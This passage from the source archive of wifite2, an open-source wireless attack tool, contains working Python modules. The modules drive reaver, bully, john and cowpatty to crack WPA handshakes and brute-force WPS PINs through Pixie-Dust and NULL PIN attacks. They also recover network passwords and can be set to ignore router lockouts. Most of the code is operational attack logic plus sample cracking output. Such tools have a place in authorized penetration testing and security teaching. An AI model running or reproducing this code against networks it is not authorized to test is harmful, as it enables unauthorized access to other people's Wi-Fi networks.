help=argparse.SUPPRESS, action='store', dest='wpa_handshake_dir', type=str) wpa.add_argument('--new-hs', action='store_true', dest='ignore_old_handshakes', help=Color.s('Captures new handshakes, ignores existing handshakes in {C}%s{W} ' '(default: {G}off{W})' % self.config.wpa_handshake_dir)) wpa.add_argument('--dict', action='store', dest='wordlist', metavar='[file]', type=str, help=Color.s( 'File containing passwords for cracking (default: {G}%s{W})') % self.config.wordlist) wpa.add_argument('--wpadt', action='store', dest='wpa_deauth_timeout', metavar='[seconds]', type=int, help=self._verbose('Time to wait between sending Deauths (default: {G}%d sec{W})' % self.config.wpa_deauth_timeout)) wpa.add_argument('-wpadt', help=argparse.SUPPRESS, action='store', dest='wpa_deauth_timeout', type=int) wpa.add_argument('--wpat', action='store', dest='wpa_attack_timeout', metavar='[seconds]', type=int, help=self._verbose('Time to wait before failing WPA attack (default: {G}%d sec{W})' % self.config.wpa_attack_timeout)) wpa.add_argument('-wpat', help=argparse.SUPPRESS, action='store', dest='wpa_attack_timeout', type=int) # TODO: Uncomment the --strip option once it works ''' wpa.add_argument('--strip', action='store_true', dest='wpa_strip_handshake', default=False, help=Color.s('Strip unnecessary packets from handshake capture using tshark')) ''' wpa.add_argument('-strip', help=argparse.SUPPRESS, action='store_true', dest='wpa_strip_handshake') def _add_wps_args(self, wps): wps.add_argument('--wps', action='store_true', dest='wps_filter', help=Color.s('Show only {C}WPS-enabled networks{W}')) wps.add_argument('-wps', help=argparse.SUPPRESS, action='store_true', dest='wps_filter') wps.add_argument('--no-wps', action='store_true', dest='no_wps', help=self._verbose('{O}Never{W} use {O}WPS PIN{W} & {O}Pixie-Dust{W} ' 'attacks on targets (default: {G}off{W})')) wps.add_argument('--wps-only', action='store_true', dest='wps_only', help=Color.s('{O}Only{W} use {C}WPS PIN{W} & {C}Pixie-Dust{W} attacks (default: {G}off{W})')) wps.add_argument('--pixie', action='store_true', dest='wps_pixie', help=self._verbose('{O}Only{W} use {C}WPS Pixie-Dust{W} attack (do not use {O}PIN attack{W})')) wps.add_argument('--no-pixie', action='store_true', dest='wps_no_pixie', help=self._verbose('{O}Never{W} use {O}WPS Pixie-Dust{W} attack (use {G}PIN attack{W})')) wps.add_argument('--no-nullpin', action='store_true', dest='wps_no_nullpin', help=self._verbose('{O}Never{W} use {O}NULL PIN{W} attack (use {G}NULL PIN attack{W})')) wps.add_argument('--bully', action='store_true', dest='use_bully', help=Color.s('Use {G}bully{W} program for WPS PIN & Pixie-Dust attacks ' '(default: {G}reaver{W})')) # Alias wps.add_argument('-bully', help=argparse.SUPPRESS, action='store_true', dest='use_bully') wps.add_argument('--reaver', action='store_true', dest='use_reaver', help=Color.s('Use {G}reaver{W} program for WPS PIN & Pixie-Dust attacks' ' (default: {G}reaver{W})')) # Alias wps.add_argument('-reaver', help=argparse.SUPPRESS, action='store_true', dest='use_reaver') # Ignore lock-outs wps.add_argument('--ignore-locks', action='store_true', dest='wps_ignore_lock', help=Color.s('Do {O}not{W} stop WPS PIN attack if AP becomes {O}locked{W} ' '(default: {G}stop{W})')) # Time limit on entire attack. wps.add_argument('--wps-time', action='store', dest='wps_pixie_timeout', metavar='[sec]', type=int, help=self._verbose('Total time to wait before failing PixieDust attack (default: {G}%d sec{W})' % self.config.wps_pixie_timeout)) # Alias wps.add_argument('-wpst', help=argparse.SUPPRESS, action='store', dest='wps_pixie_timeout', type=int) # Maximum number of 'failures' (WPSFail) wps.add_argument('--wps-fails', action='store', dest='wps_fail_threshold', metavar='[num]', type=int, help=self._verbose('Maximum number of WPSFail/NoAssoc errors before failing ' '(default: {G}%d{W})' % self.config.wps_fail_threshold)) # Alias wps.add_argument('-wpsf', help=argparse.SUPPRESS, action='store', dest='wps_fail_threshold', type=int) # Maximum number of 'timeouts' wps.add_argument('--wps-timeouts', action='store', dest='wps_timeout_threshold', metavar='[num]', type=int, help=self._verbose('Maximum number of Timeouts before failing (default: {G}%d{W})' % self.config.wps_timeout_threshold)) # Alias wps.add_argument('-wpsto', help=argparse.SUPPRESS, action='store', dest='wps_timeout_threshold', type=int) def _add_pmkid_args(self, pmkid): pmkid.add_argument('--pmkid', action='store_true', dest='use_pmkid_only', help=Color.s('{O}Only{W} use {C}PMKID capture{W}, avoids other WPS & ' 'WPA attacks (default: {G}off{W})')) pmkid.add_argument('--no-pmkid', action='store_true', dest='dont_use_pmkid', help=Color.s('{O}Don\'t{W} use {C}PMKID capture{W} (default: {G}off{W})')) # Alias pmkid.add_argument('-pmkid', help=argparse.SUPPRESS, action='store_true', dest='use_pmkid_only') pmkid.add_argument('--pmkid-timeout', action='store', dest='pmkid_timeout', metavar='[sec]', type=int, help=Color.s('Time to wait for PMKID capture (default: {G}%d{W} seconds)' % self.config.pmkid_timeout)) @staticmethod def _add_command_args(commands): commands.add_argument('--cracked', action='store_true', dest='cracked', help=Color.s('Print previously-cracked access points')) commands.add_argument('-cracked', help=argparse.SUPPRESS, action='store_true', dest='cracked') commands.add_argument('--check', action='store', metavar='file', nargs='?', const='', dest='check_handshake', help=Color.s('Check a {C}.cap file{W} (or all {C}hs/*.cap{W} files) for WPA handshakes')) commands.add_argument('-check', help=argparse.SUPPRESS, action='store', nargs='?', const='', dest='check_handshake') commands.add_argument('--crack', action='store_true', dest='crack_handshake', help=Color.s('Show commands to crack a captured handshake')) if __name__ == '__main__': from .config import Configuration Configuration.initialize(False) a = Arguments(Configuration) args = a.args for (key, value) in sorted(args.__dict__.items()): Color.pl('{C}%s: {G}%s{W}' % (key.ljust(21), value)) wifite2-2.7.0/wifite/tools/0000755000175000017500000000000014437644461015075 5ustar sophiesophiewifite2-2.7.0/wifite/tools/john.py0000755000175000017500000000364014437644461016413 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from ..config import Configuration from ..util.color import Color from ..util.process import Process from ..tools.hashcat import HcxPcapngTool import os class John(Dependency): """ Wrapper for John program. """ dependency_required = False dependency_name = 'john' dependency_url = 'https://www.openwall.com/john/' @staticmethod def crack_handshake(handshake, show_command=False): john_file = HcxPcapngTool.generate_john_file(handshake, show_command=show_command) key = None # Use `john --list=formats` to find if OpenCL or CUDA is supported. formats_stdout = Process(['john', '--list=formats']).stdout() if 'wpapsk-opencl' in formats_stdout: john_format = 'wpapsk-opencl' elif 'wpapsk-cuda' in formats_stdout: john_format = 'wpapsk-cuda' else: john_format = 'wpapsk' # Crack john file command = ['john', f'--format={john_format}', f'--wordlist={Configuration.wordlist}', john_file] if show_command: Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command)) process = Process(command) process.wait() # Run again with --show to consistently get the password command = ['john', '--show', john_file] if show_command: Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command)) process = Process(command) stdout, stderr = process.get_output() # Parse password (regex doesn't work for some reason) if '0 password hashes cracked' in stdout: key = None else: for line in stdout.split('\n'): if handshake.capfile in line: key = line.split(':')[1] break if os.path.exists(john_file): os.remove(john_file) return key wifite2-2.7.0/wifite/tools/cowpatty.py0000644000175000017500000000210414437644461017316 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from ..config import Configuration from ..util.color import Color from ..util.process import Process from ..tools.hashcat import HcxPcapngTool import os import re class Cowpatty(Dependency): ''' Wrapper for Cowpatty program. ''' dependency_required = False dependency_name = 'cowpatty' dependency_url = 'https://tools.kali.org/wireless-attacks/cowpatty' @staticmethod def crack_handshake(handshake, show_command=False): # Crack john file command = [ 'cowpatty', '-f', Configuration.wordlist, '-r', handshake.capfile, '-s', handshake.essid ] if show_command: Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command)) process = Process(command) stdout, stderr = process.get_output() key = None for line in stdout.split('\n'): if 'The PSK is "' in line: key = line.split('"', 1)[1][:-2] break return key wifite2-2.7.0/wifite/tools/reaver.py0000755000175000017500000004071214437644461016742 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import contextlib from .dependency import Dependency from .airodump import Airodump from .bully import Bully # for PSK retrieval from ..model.attack import Attack from ..config import Configuration from ..model.wps_result import CrackResultWPS from ..util.color import Color from ..util.process import Process from ..util.timer import Timer import os import time import re class Reaver(Attack, Dependency): dependency_required = False dependency_name = 'reaver' dependency_url = 'https://github.com/t6x/reaver-wps-fork-t6x' def __init__(self, target, pixie_dust=True, null_pin=False): super(Reaver, self).__init__(target) self.pixie_dust = pixie_dust self.null_pin = null_pin self.progress = '0.00%' self.state = 'Initializing' self.locked = False self.total_attempts = 0 self.total_timeouts = 0 self.total_wpsfails = 0 self.last_pins = set() self.last_line_number = 0 self.crack_result = None self.output_filename = Configuration.temp('reaver.out') if os.path.exists(self.output_filename): os.remove(self.output_filename) self.output_write = open(self.output_filename, 'a') self.reaver_cmd = [ 'reaver', '--interface', Configuration.interface, '--bssid', self.target.bssid, '--channel', self.target.channel, '-vv', '-N', '-O', 'reaver_output.pcap' ] if pixie_dust: self.reaver_cmd.extend(['--pixie-dust', '1']) if null_pin: # self.reaver_cmd.extend(['-O', 'reaver_output.pcap']) # This is for logging output self.reaver_cmd.extend(['-p', '']) # NULL PIN attack parameter self.reaver_proc = None @staticmethod def is_pixiedust_supported(): """ Checks if 'reaver' supports WPS Pixie-Dust attack """ output = Process(['reaver', '-h']).stderr() return '--pixie-dust' in output def run(self): """ Returns True if attack is successful. """ try: self._run() # Run-loop except Exception as e: # Failed with error self.pattack('{R}Failed:{O} %s' % str(e), newline=True) return self.crack_result is not None # Stop reaver if it's still running if self.reaver_proc.poll() is None: self.reaver_proc.interrupt() # Clean up open file handle if self.output_write: self.output_write.close() return self.crack_result is not None def _run(self): self.start_time = time.time() with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, skip_wps=True, output_file_prefix='pixie') as airodump: # Wait for target self.pattack('Waiting for target to appear...') self.target = self.wait_for_target(airodump) # Start reaver self.reaver_proc = Process(self.reaver_cmd, stdout=self.output_write, stderr=Process.devnull()) # Say "yes" if asked to restore session. self.reaver_proc.stdin('y\n') # Loop while reaver is running while self.crack_result is None and self.reaver_proc.poll() is None: # Refresh target information (power) self.target = self.wait_for_target(airodump) # Update based on reaver output stdout = self.get_output() self.state = self.parse_state(stdout) self.parse_failure(stdout) # Print status line self.pattack(self.get_status()) # Check if we cracked it self.crack_result = self.parse_crack_result(stdout) # Check if locked if self.locked and not Configuration.wps_ignore_lock: raise Exception('{O}Because access point is {R}Locked{W}') time.sleep(0.5) # Check if crack result is in output stdout = self.get_output() self.crack_result = self.parse_crack_result(stdout) # Show any failures found if self.crack_result is None: self.parse_failure(stdout) if self.crack_result is None and self.reaver_proc.poll() is not None: raise Exception(f'Reaver process stopped (exit code: {self.reaver_proc.poll()})') def get_status(self): if self.pixie_dust or self.null_pin: main_status = '' else: # Include percentage main_status = '({G}%s{W}) ' % self.progress # Current state (set in parse_* methods) main_status += self.state # Counters, timeouts, failures, locked. meta_statuses = [] if self.total_timeouts > 0: meta_statuses.append('{O}Timeouts:%d{W}' % self.total_timeouts) if self.total_wpsfails > 0: meta_statuses.append('{O}Fails:%d{W}' % self.total_wpsfails) if self.locked: meta_statuses.append('{R}Locked{W}') if meta_statuses: main_status += f" ({', '.join(meta_statuses)})" return main_status def parse_crack_result(self, stdout): if self.crack_result is not None: return self.crack_result (pin, psk, ssid) = self.get_pin_psk_ssid(stdout) # Check if we cracked it, or if process stopped. if pin is not None: # We cracked it. if psk is not None: # Reaver provided PSK self.pattack('{G}Cracked WPS PIN: {C}%s{W} {G}PSK: {C}%s{W}' % (pin, psk), newline=True) else: self.pattack('{G}Cracked WPS PIN: {C}%s' % pin, newline=True) # Try to derive PSK from PIN using Bully self.pattack('{W}Retrieving PSK using {C}bully{W}...') psk = None with contextlib.suppress(KeyboardInterrupt): psk = Bully.get_psk_from_pin(self.target, pin) if psk is None: Color.pl('') self.pattack('{R}Failed {O}to get PSK using bully', newline=True) else: self.pattack('{G}Cracked WPS PSK: {C}%s' % psk, newline=True) crack_result = CrackResultWPS(self.target.bssid, ssid, pin, psk) crack_result.dump() return crack_result return None def parse_failure(self, stdout): # Total failure if 'WPS pin not found' in stdout: raise Exception('Reaver says "WPS pin not found"') # Running-time failure if self.pixie_dust and self.running_time() > Configuration.wps_pixie_timeout: raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout) if self.null_pin and self.running_time() > Configuration.wps_pixie_timeout: raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout) # WPSFail count self.total_wpsfails = stdout.count('WPS transaction failed') if self.total_wpsfails >= Configuration.wps_fail_threshold: raise Exception('Too many failures (%d)' % self.total_wpsfails) # Timeout count self.total_timeouts = stdout.count('Receive timeout occurred') if self.total_timeouts >= Configuration.wps_timeout_threshold: raise Exception('Too many timeouts (%d)' % self.total_timeouts) def parse_state(self, stdout): state = self.state # Check last line for current status stdout_last_line = stdout.split('\n')[-1] # [+] Waiting for beacon from AA:BB:CC:DD:EE:FF if 'Waiting for beacon from' in stdout_last_line: state = 'Waiting for beacon' elif 'Associated with' in stdout_last_line: state = 'Associated' elif 'Starting Cracking Session.' in stdout_last_line: state = 'Started Cracking' elif 'Trying pin' in stdout_last_line: state = 'Trying PIN' elif 'Sending EAPOL START request' in stdout_last_line: state = 'Sending EAPOL' elif 'Sending identity response' in stdout_last_line: state = 'Sending ID' self.locked = False elif 'Sending M' in stdout_last_line: for num in ['2', '4', '6']: if f'Sending M{num} message' in stdout_last_line: state = f'Sending M{num}' if num == '2' and self.pixie_dust: state += ' / Running pixiewps' self.locked = False elif 'Received M' in stdout_last_line: for num in ['1', '3', '5', '7']: if f'Received M{num} message' in stdout_last_line: state = f'Received M{num}' self.locked = False elif 'Detected AP rate limiting,' in stdout_last_line: state = 'Rate-Limited by AP' self.locked = True elif 'AP requested deauth' in stdout_last_line: state = 'AP requested deauth' self.locked = True # Parse all lines since last check stdout_diff = stdout[self.last_line_number:] self.last_line_number = len(stdout) # Detect percentage complete # [+] 0.05% complete @ 2018-08-23 15:17:23 (42 seconds/pin) percentages = re.findall(r"([\d.]+%) complete .* \(([\d.]+) seconds/pin\)", stdout_diff) if len(percentages) > 0: self.progress = percentages[-1][0] if new_pins := set(re.findall(r'Trying pin "(\d+)"', stdout_diff)): self.total_attempts += len(new_pins.difference(self.last_pins)) self.last_pins = new_pins # TODO: Look for "Sending M6 message" which indicates first 4 digits are correct. return state def pattack(self, message, newline=False): # Print message with attack information. if self.pixie_dust: time_left = Configuration.wps_pixie_timeout - self.running_time() time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left) attack_name = 'Pixie-Dust' elif self.null_pin: time_left = Configuration.wps_pixie_timeout - self.running_time() time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left) attack_name = 'NULL PIN' else: time_left = self.running_time() time_msg = '{C}%s{W}' % Timer.secs_to_str(time_left) attack_name = 'PIN Attack' if self.total_attempts > 0 and not self.pixie_dust and not self.null_pin: time_msg += ' {D}PINs:{W}{C}%d{W}' % self.total_attempts Color.clear_entire_line() Color.pattack('WPS', self.target, attack_name, '{W}[%s] %s' % (time_msg, message)) if newline: Color.pl('') def running_time(self): return int(time.time() - self.start_time) @staticmethod def get_pin_psk_ssid(stdout): """ Parses WPS PIN, PSK, and SSID from output """ pin = psk = ssid = None # Check for PIN. ''' [+] WPS pin: 11867722 ''' if regex := re.search(r"WPS pin:\s*(\d+)", stdout, re.IGNORECASE): pin = regex[1] if pin is None: ''' [+] WPS PIN: '11867722' ''' if regex := re.search(r"WPS PIN:\s*'(\d+)'", stdout, re.IGNORECASE): pin = regex[1] # Check for PSK. # Note: Reaver 1.6.x does not appear to return PSK (?) ''' [+] WPA PSK: 'password' ''' if regex := re.search(r"WPA PSK:\s*'(.+)'", stdout): psk = regex[1] # Check for SSID '''1.x [Reaver Test] [+] AP SSID: 'Test Router' ''' if regex := re.search(r"AP SSID:\s*'(.*)'", stdout): ssid = regex[1] # Check (again) for SSID if ssid is None: '''1.6.x [+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)''' if regex := re.search(r"Associated with [\dA-F:]+ \(ESSID: (.*)\)", stdout): ssid = regex[1] return pin, psk, ssid def get_output(self): """ Gets output from reaver's output file """ if not self.output_filename: return '' if self.output_write: self.output_write.flush() with open(self.output_filename, 'r') as fid: stdout = fid.read() if Configuration.verbose > 1: Color.pe('\n{P} [reaver:stdout] %s' % '\n [reaver:stdout] '.join(stdout.split('\n'))) return stdout.strip() if __name__ == '__main__': old_stdout = ''' [Pixie-Dust] [Pixie-Dust] Pixiewps 1.1 [Pixie-Dust] [Pixie-Dust] [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust] [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust] [+] WPS pin: 12345678 [Pixie-Dust] [Pixie-Dust] [*] Time taken: 0 s [Pixie-Dust] Running reaver with the correct pin, wait ... Cmd : reaver -i wlan0mon -b 08:86:3B:8C:FD:9C -c 11 -s y -vv -p 28097402 [Reaver Test] BSSID: AA:BB:CC:DD:EE:FF [Reaver Test] Channel: 11 [Reaver Test] [+] WPS PIN: '12345678' [Reaver Test] [+] WPA PSK: 'Test PSK' [Reaver Test] [+] AP SSID: 'Test Router' ''' # From vom513 in https://github.com/derv82/wifite2/issues/60 new_stdout = ''' [+] Switching wlan1mon to channel 5 [+] Waiting for beacon from EC:1A:59:37:70:0E [+] Received beacon from EC:1A:59:37:70:0E [+] Vendor: RealtekS [+] Trying pin "12345670" [+] Sending authentication request [+] Sending association request [+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message Pixiewps 1.4 [?] Mode: 3 (RTL819x) [*] Seed N1: - [*] Seed ES1: - [*] Seed ES2: - [*] PSK1: 2c2e33f5e3a870759f0aeebbd2792450 [*] PSK2: 3f4ca4ea81b2e8d233a4b80f9d09805d [*] ES1: 04d48dc20ec785762ce1a21a50bc46c2 [*] ES2: 04d48dc20ec785762ce1a21a50bc46c2 [+] WPS pin: 11867722 [*] Time taken: 0 s 21 ms executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c548 79f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684ca f35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b 5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 5a67001334e3e4cb236f4e134a4d3b48d625a648e991f978d9 aca879469d5da5 -z c8a2ccc5fb6dc4f4d69b245091022dc7e998e42ec1d548d57c35a312ff63ef20 -a 60b59c0c587c6c44007f7081c3372 489febbe810a97483f5cc5cd8463c3920de -n 04d48dc20ec785762ce1a21a50bc46c2 -r 7a191e22a7b519f40d3af21b93a21d4f837718b4 5063a8a69ac6d16c6e5203477c18036ca01e9e56d0322e70c2e1baa66518f1b46d01acc577d1dfa34efd2e9ee36e2b7e68819cddacceb596a88 95243e33cb48c570458a539dcb523a4d4c4360e158c29b882f7f385821ea043705eb56538b45daa445157c84e60fc94ef48136eb4e9725b1349 02b96c90b1ae54cbd42b29b52611903fdae5aa88bfc320f173d2bbe31df4996ebdb51342c6b8bd4e82ae5aa80b2a09a8bf8faa9a8332dc9819 ''' pin_attack_stdout = ''' [+] Pin cracked in 16 seconds [+] WPS PIN: '01030365' [+] WPA PSK: 'password' [+] AP SSID: 'AirLink89300' ''' (pin, psk, ssid) = Reaver.get_pin_psk_ssid(old_stdout) assert pin == '12345678', f'pin was "{pin}", should have been "12345678"' assert psk == 'Test PSK', f'psk was "{psk}", should have been "Test PSK"' assert ssid == 'Test Router', f'ssid was {repr(ssid)}, should have been Test Router' result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk) result.dump() print('') (pin, psk, ssid) = Reaver.get_pin_psk_ssid(new_stdout) assert pin == '11867722', f'pin was "{pin}", should have been "11867722"' assert psk is None, f'psk was "{psk}", should have been "None"' assert ( ssid == 'belkin.00e' ), f'ssid was "{repr(ssid)}", should have been "belkin.00e"' result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk) result.dump() print('') (pin, psk, ssid) = Reaver.get_pin_psk_ssid(pin_attack_stdout) assert pin == '01030365', f'pin was "{pin}", should have been "01030365"' assert psk == 'password', f'psk was "{psk}", should have been "password"' assert ( ssid == 'AirLink89300' ), f'ssid was "{repr(ssid)}", should have been "AirLink89300"' result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk) result.dump() print('') wifite2-2.7.0/wifite/tools/bully.py0000755000175000017500000003117614437644461016611 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from .airodump import Airodump from ..model.attack import Attack from ..model.wps_result import CrackResultWPS from ..util.color import Color from ..util.timer import Timer from ..util.process import Process from ..config import Configuration import time import re from threading import Thread class Bully(Attack, Dependency): dependency_required = False dependency_name = 'bully' dependency_url = 'https://github.com/kimocoder/bully' def __init__(self, target, pixie_dust=True): super(Bully, self).__init__(target) self.target = target self.pixie_dust = pixie_dust self.total_attempts = 0 self.total_timeouts = 0 self.total_failures = 0 self.locked = False self.state = '{O}Waiting for beacon{W}' self.start_time = time.time() self.last_pin = "" self.pins_remaining = -1 self.eta = '' self.cracked_pin = self.cracked_key = self.cracked_bssid = self.cracked_essid = None self.crack_result = None self.cmd = [] if Process.exists('stdbuf'): self.cmd.extend([ 'stdbuf', '-o0' # No buffer. See https://stackoverflow.com/a/40453613/7510292 ]) self.cmd.extend([ 'bully', '--bssid', target.bssid, '--channel', target.channel, # '--detectlock', # Detect WPS lockouts unreported by AP # Restoring session from '/root/.bully/34210901927c.run' # WARNING: WPS checksum was bruteforced in prior session, now autogenerated # Use --force to ignore above warning(s) and continue anyway '--force', '-v', '4', Configuration.interface ]) if self.pixie_dust: self.cmd.insert(-1, '--pixiewps') self.bully_proc = None def run(self): with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, skip_wps=True, output_file_prefix='wps_pin') as airodump: # Wait for target self.pattack('Waiting for target to appear...') self.target = self.wait_for_target(airodump) # Start bully self.bully_proc = Process(self.cmd, stderr=Process.devnull(), bufsize=0, cwd=Configuration.temp()) # Start bully status thread t = Thread(target=self.parse_line_thread) t.daemon = True t.start() try: self._run(airodump) except (KeyboardInterrupt, Exception) as e: self.stop() raise e if self.crack_result is None: self.pattack('{R}Failed{W}', newline=True) def _run(self, airodump): while self.bully_proc.poll() is None: try: self.target = self.wait_for_target(airodump) except Exception as e: self.pattack('{R}Failed: {O}%s{W}' % e, newline=True) Color.pexception(e) self.stop() break # Update status self.pattack(self.get_status()) # Thresholds only apply to Pixie-Dust if self.pixie_dust: # Check if entire attack timed out. if self.running_time() > Configuration.wps_pixie_timeout: self.pattack('{R}Failed: {O}Timeout after %d seconds{W}' % ( Configuration.wps_pixie_timeout), newline=True) self.stop() return # Check if timeout threshold was breached if self.total_timeouts >= Configuration.wps_timeout_threshold: self.pattack('{R}Failed: {O}More than %d Timeouts{W}' % ( Configuration.wps_timeout_threshold), newline=True) self.stop() return # Check if WPSFail threshold was breached if self.total_failures >= Configuration.wps_fail_threshold: self.pattack('{R}Failed: {O}More than %d WPSFails{W}' % ( Configuration.wps_fail_threshold), newline=True) self.stop() return elif self.locked and not Configuration.wps_ignore_lock: self.pattack('{R}Failed: {O}Access point is {R}Locked{O}', newline=True) self.stop() return time.sleep(0.5) def pattack(self, message, newline=False): # Print message with attack information. if self.pixie_dust: # Count down time_left = Configuration.wps_pixie_timeout - self.running_time() attack_name = 'Pixie-Dust' else: # Count up time_left = self.running_time() attack_name = 'PIN Attack' if self.eta: time_msg = '{D}ETA:{W}{C}%s{W}' % self.eta else: time_msg = '{C}%s{W}' % Timer.secs_to_str(time_left) if self.pins_remaining >= 0: time_msg += ', {D}PINs Left:{W}{C}%d{W}' % self.pins_remaining else: time_msg += ', {D}PINs:{W}{C}%d{W}' % self.total_attempts Color.clear_entire_line() Color.pattack('WPS', self.target, attack_name, '{W}[%s] %s' % (time_msg, message)) if newline: Color.pl('') def running_time(self): return int(time.time() - self.start_time) def get_status(self): main_status = self.state meta_statuses = [] if self.total_timeouts > 0: meta_statuses.append('{O}Timeouts:%d{W}' % self.total_timeouts) if self.total_failures > 0: meta_statuses.append('{O}Fails:%d{W}' % self.total_failures) if self.locked: meta_statuses.append('{R}Locked{W}') if meta_statuses: main_status += f" ({', '.join(meta_statuses)})" return main_status def parse_line_thread(self): for line in iter(self.bully_proc.pid.stdout.readline, b''): if line == '': continue line = line.decode('utf-8') line = line.replace('\r', '').replace('\n', '').strip() if Configuration.verbose > 1: Color.pe('\n{P} [bully:stdout] %s' % line) self.state = self.parse_state(line) self.crack_result = self.parse_crack_result(line) if self.crack_result: break def parse_crack_result(self, line): if pin_key_re := re.search(r"Pin is '(\d*)', key is '(.*)'", line): self.cracked_pin = pin_key_re[1] self.cracked_key = pin_key_re[2] ############### # Check for PIN if self.cracked_pin is None: if pin_re := re.search(r"^\s*PIN\s*:\s*'(.*)'\s*$", line): self.cracked_pin = pin_re[1] if pin_re := re.search(r"^\[Pixie-Dust] PIN FOUND: '?(\d*)'?\s*$", line): self.cracked_pin = pin_re[1] if self.cracked_pin is not None: # Mention the PIN & that we're not done yet. self.pattack('{G}Cracked PIN: {C}%s{W}' % self.cracked_pin, newline=True) self.state = '{G}Finding Key...{C}' time.sleep(2) if key_re := re.search(r"^\s*KEY\s*:\s*'(.*)'\s*$", line): self.cracked_key = key_re[1] if not self.crack_result and self.cracked_pin and self.cracked_key: self.pattack('{G}Cracked Key: {C}%s{W}' % self.cracked_key, newline=True) self.crack_result = CrackResultWPS( self.target.bssid, self.target.essid, self.cracked_pin, self.cracked_key) Color.pl('') self.crack_result.dump() return self.crack_result def parse_state(self, line): # sourcery no-metrics state = self.state if re.search(r".*Got beacon for '(.*)' \((.*)\)", line): # group(1)=ESSID, group(2)=BSSID state = 'Got beacon' if last_state := re.search(r".*Last State = '(.*)'\s*Next pin '(.*)'", line): # group(1)=NoAssoc, group(2)=PIN pin = last_state[2] if pin != self.last_pin: self._extracted_from_parse_state_12(pin) state = 'Trying PIN' if mx_result_pin := re.search(r".*[RT]x\(\s*(.*)\s*\) = '(.*)'\s*Next pin '(.*)'", line): state = self._extracted_from_parse_state_20(mx_result_pin) if re_tested := re.search(r'Run time ([\d:]+), pins tested (\d)+', line): # group(1)=01:23:45, group(2)=1234 self.total_attempts = int(re_tested[2]) if re_remaining := re.search(r' (\d+) pins remaining', line): self.pins_remaining = int(re_remaining[1]) if re_eta := re.search(r'time to crack is (\d+) hours, (\d+) minutes, (\d+) seconds', line): h, m, s = re_eta.groups() self.eta = f"{h.rjust(2, '0')}h{m.rjust(2, '0')}m{s.rjust(2, '0')}s" if re_lockout := re.search(r".*WPS lockout reported, sleeping for (\d+) seconds", line): self.locked = True sleeping = re_lockout[1] state = '{R}WPS Lock-out: {O}Waiting %s seconds...{W}' % sleeping if re.search(r".*\[Pixie-Dust] WPS pin not found", line): state = '{R}Failed: {O}Bully says "WPS pin not found"{W}' if re.search(r".*Running pixiewps with the information", line): state = '{G}Running pixiewps...{W}' return state # TODO Rename this here and in `parse_state` def _extracted_from_parse_state_20(self, mx_result_pin): # group(1)=M1,M2,..,M7, group(2)=result, group(3)=Next PIN self.locked = False m_state = mx_result_pin[1] result = mx_result_pin[2] pin = mx_result_pin[3] if pin != self.last_pin: self._extracted_from_parse_state_12(pin) if result in ['Pin1Bad', 'Pin2Bad']: result = '{G}%s{W}' % result elif result == 'Timeout': self.total_timeouts += 1 result = '{O}%s{W}' % result elif result == 'WPSFail': self.total_failures += 1 result = '{O}%s{W}' % result elif result == 'NoAssoc': result = '{O}%s{W}' % result else: result = '{R}%s{W}' % result result = '{P}%s{W}:%s' % (m_state.strip(), result.strip()) result = f'Trying PIN ({result})' return result # TODO Rename this here and in `parse_state` def _extracted_from_parse_state_12(self, pin): self.last_pin = pin self.total_attempts += 1 if self.pins_remaining > 0: self.pins_remaining -= 1 def stop(self): if hasattr(self, 'pid') and self.pid and self.pid.poll() is None: self.pid.interrupt() def __del__(self): self.stop() @staticmethod def get_psk_from_pin(target, pin): # Fetches PSK from a Target assuming 'pin' is the correct PIN """ bully --channel 1 --bssid 34:21:09:01:92:7C --pin 01030365 --bruteforce wlan0mon PIN : '01030365' KEY : 'password' BSSID : '34:21:09:01:92:7c' ESSID : 'AirLink89300' """ cmd = [ 'bully', '--channel', target.channel, '--bssid', target.bssid, '--pin', pin, '--bruteforce', '--force', Configuration.interface ] bully_proc = Process(cmd) for line in bully_proc.stderr().split('\n'): key_re = re.search(r"^\s*KEY\s*:\s*'(.*)'\s*$", line) if key_re is not None: return key_re[1] return None if __name__ == '__main__': Configuration.initialize() Configuration.interface = 'wlan0mon' from ..model.target import Target fields = '34:21:09:01:92:7C,2015-05-27 19:28:44,2015-05-27 ' \ '19:28:46,1,54,WPA2,CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,AirLink89300,'.split(',') target = Target(fields) psk = Bully.get_psk_from_pin(target, '01030365') print(('psk', psk)) # stdout = " [*] Pin is '11867722', key is '9a6f7997'" # Configuration.initialize(False) # from ..model.target import Target # fields = 'AA:BB:CC:DD:EE:FF,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,' \ # 'CCMP TKIP,PSK,-58,2,0,0.0.0.0,9,HOME-ABCD,'.split(',') # target = Target(fields) # b = Bully(target) # 